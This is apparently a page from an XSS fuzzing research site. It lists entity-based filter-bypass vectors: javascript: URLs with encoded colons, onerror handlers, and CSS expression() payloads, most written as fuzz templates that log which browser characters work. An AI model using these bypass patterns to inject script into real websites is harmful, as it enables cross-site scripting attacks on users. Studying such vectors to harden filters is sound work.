Featured vector
Default Browser 0.0
<!-- sample vector --> <img src onerror0x0a=0x0aalert(1)>
<!-- sample vector --> <img src onerror0x0a=0x0aalert(1)>
Fuzz vector cloud
Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Property Protocol Script URL XSS attribute bla bypass challenge char comment data encoding entities entity event events expression flash for fun handler href img innerHTML navigateURL onload prompt properties regex space src string style svg tag tags test testing uri vbscript xml
3,403,239 Successful fuzzes
Fuzz Vectors
Searching for "entities"
Your browser identified asGeneral Crawlers unknown
All vectors
| Description | Vector | Created by |
|---|---|---|
| allowed characters in entities | <a id="fuzzelement*num*" href="javascript&col*chr*on;alert">aaa</a> <script> if(document.getElementById('fuzzelement*num*').protocol==='javascript:'){ logChr(*num*); } </script> | @insertScript |
| Characters that can be used to terminate entities in an href | <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> | @tifkin_ |
| Characters allowed between and in HTML entities in style attribute | <div style="x:expression(l&*chr*#x6F;gChr(*num*))"> | @tifkin_ |
| characters allowd in html entities | <a href="javascript&co*chr*lon;alert(1)" id="fuzzelement*num*">test</a> | @insertScript |
| Entities allowed with no semi colon | htmlStr = '<div title="'+*dataentities*.replace(/;/,'')+'">test</div>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.title.length===1) { customLog(*dataentities*); } }catch(e){}; | @garethheyes |
| html dataentities before event handler | <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> | @testacc40590139 |
| Entities allowed instead of colon for js protocol | htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | @peksa |
| Entities allowed after js protocol | htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | @garethheyes |
| Entities allowed before js protocol | htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | @garethheyes |
| Entities allowed inside js protocol | htmlStr = '<a href="java'+*dataentities*+'script:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | @garethheyes |
| Entities allowed before CSS rule | htmlStr = '<div style="'+*dataentities*+'color:#cccccc;"></div>'; document.getElementById('placeholder').innerHTML = htmlStr; if(document.getElementById('placeholder').firstChild.style.color.length) { customLog(*dataentities*); } | @garethheyes |